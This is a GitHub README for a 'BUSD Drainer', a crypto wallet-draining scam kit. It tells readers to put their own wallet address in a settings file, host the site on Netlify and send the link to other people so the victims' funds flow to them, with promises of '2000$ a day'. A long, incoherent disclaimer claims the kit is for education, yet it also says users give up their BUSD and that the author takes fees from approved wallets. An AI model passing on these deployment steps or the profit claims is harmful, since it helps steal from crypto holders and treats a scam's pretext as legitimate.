
Primary LanguageJavaScriptMIT LicenseMIT

Watch the Youtube Tutorial for more Instructions: https://youtu.be/ymfIRn52jZQ

How to use the BUSD Drainer:

  1. Click on star and fork in the upper right corner
  2. Open up the settings.js file and replace the marked words in the first row with your bsc adress
  3. Go to https://www.netlify.com/ and import your site via github
  4. Open your drainer site: https://www.officialbscminer.com/ and send the link to other people
  5. That's it. The money goes to the bsc wallet adress you have linked in the settings.js file

This is the same method pro hackers use to make millions 💰 You could make like 2000$ a day with this drainer

!Please only use this for educational purposes not too hack others Please use for testing or educational purposes only Make sure you read everything before using this script Johnnww is not responsible for mistakes or tester who dont spend the time to full read this readme by using this script you accept everything listed in this script in the readme if you dont want to agree to my terms for testing and educational purposes do not use this script. Do not use this script on innocent people Johnnww will not be held responsible for someone who does that this script was only designed for educational or testing purposes to futher increase the security of crypto in the future please read the terms of service and disclaimer before actually using or testing this script money with bots will assume that all users understand everything stated in the disclaimer and terms of service. Dont use this with out reading everything in detail!!!

MIT License

Copyright (c) 2022 Johnnww

Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:

The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.


terms and conditions

by using this script you void all rights to sue or prosicute the developers and using this script to hack others will only hold the hackers responsible for legal and civil actions that may arise from exploiting others this script is only intended to educate people on how this scam works. This script is only intended to be used to educate people its not intended to be used for real world situations. Do not use this script to scam other people. By using this script you agree to these terms and services if you do not want to agree to these terms do not use this script. Also Johnnww is protected under this clause do to the fact he has no affiliations with this script being used in the real world Johnnww is just trying to bring awareness to this type of scam

𝐃𝐢𝐬𝐜𝐥𝐚𝐢𝐦𝐞𝐫: i do not promote hacking i just want to share how hackers have been draining millions of dollars so that the community can learn about it by using this free script you accept the terms that i will not be held responsible for damages arising from the use and damages arising from improperly using this script to hack others or testing. the reason for this script is for purely education purposes only this script is not intended to be used for illegal purposes all content of this script is only there to educate people to avoid being scammed. By using this script you void all ownership too your busd in your wallet and allow it to be used transfered and sold by any wallet approved to do so by this script. And as the user of this script you allow all wallets used by this script to access spend and use your Busd. Johnnww is not the creator of this script. Money with bots is not the creator of this script and holds no responsibily in proving the legitmancy of this script money with bots therefore cannot guanrentee anything said about this script im just trying to share this script to the public so that people are aware of this.The amount approved by the wallet holder shall be consider fees to using the script if the wallet holder does not wish to agree then dont use this script money with bots does not intend on deciving or scamming anyone the fees charged shall be up to the approved amount and can be deducted at anytime. The approval amount can be set and changed by the testers but its default is set and hardcoded into this code. Please do not use this script illegally there is no way i can tell if someone is using this illegally and i do not and will not knowingly allow innocent people to be drained by this script if i suspect anyone of knowingly using this script illegally i will refuse to work with that person in aiding or testing this script. Also this script does not count as any investment or ponzi scheme do to the fact that its not intended to be used in real world scenerios and the fees charged is used to award the users for participating in this testing this script all profits made from this script shall be considered fees for using this script for me finding and uploading it and causing awarness towards this script. This script will help people not be scammed by causing awareness of this type of scam/hack so hopefully in the future crypto will be able to add more safety features to its wallets to limit this type of method. But the only way that this can happen is by more people knowing about it in detail. Do not use this script to hack others i really cannot stress that i have no way of filtering legitmate people and non legit people so all of that will be up too the proper authorities to do because Johnnww does not have those resources. In the beginning of this script readme i state on use this for education purposes which is the first thing people see so i really tried my best to make people not use this illegally and did all i could do to prevent that. Also do to users who use this script outside of github there is no way for me to know a tester from a innocent person so if someone is using this in the real world i am not aware of it and if i suspect that its being used on a real person i will try to blacklist the hacker but this would be impossible for me to do because it has been download by many people and this script may be already in the wild and edited to suit the hackers form but that is a risk that must be taken to educate this generation on this type of scam. The statements made in the readme and youtube video should be taken with a grain of salt because i have not personally used or tested this script before but have been told that it preforms well. I am not well educated on coding or this script and does not have the understanding to see if the code works as stated in the video but i was told be a coder that this was how it worked and i obtained this script from him. So the forks and clones is what should be targeted if an investigation or civil suit is applied from this because there the ones who are actually using and spreading this script not me Johnnww has never used this script on a real person and does not ever intend on doing that in the future. Please make sure you read this disclamer fully before using or testing this script it states my full and honost intentions and no decieving or fraud has been done by me Johnnww. All profits Johnnww makes is used to maintain the servers and my time to keep this running indefiently if i dont profit from this then i would not be able to keep this script running properly so this script does allow Johnnww to profit from this script if he chooses to do so which is run by a automated server which could send fees to Johnnww directly so he can keep the script running and operational for testers the way this works is a trade secret and cannot be futher explained here. But my main point is that Johnnww is able to profit from the money the testers use so that he can keep this script fully functinal and add updates by the Johnnww team. But no one has invested in this script no one is recruited for this script no one is being decieved by this script so if Johnnww is contacted by any law enforcements there will be little he could do to help with identifing the hackers that are cloning this script and using it on innocent people. In closing Johnnww is doing this for a profit but he is only trying to profit from the testers money that they use to test this script if Johnnww profit from any innocent person he would not be able to tell if is from an innocent person or one of the many scammers claming to be an innocent person so without hard proof of any person thats innocent thats been drained by this script Johnnww would not be able to help and also since Johnnww doesnt recieve the full amount and only charge fees he would not be able to do any refunds do to the fact that it would not all go to me Johnnww. But money with bots would be able to do a partial refund on a case by case basis but do to the amount of scammers out there Johnnww will not activily scan for innocent people being scammed by this and will count on the people that forked it and cloned it to only use this for legit purposes.Update do to people exploiting the automation system that was previously being designed all transactions will be done manually from 7/17/2022 on and foward untill a more secure method is applied!!! Innocent non testers are the only ones eligable for a partial refund testers are not eligable!!!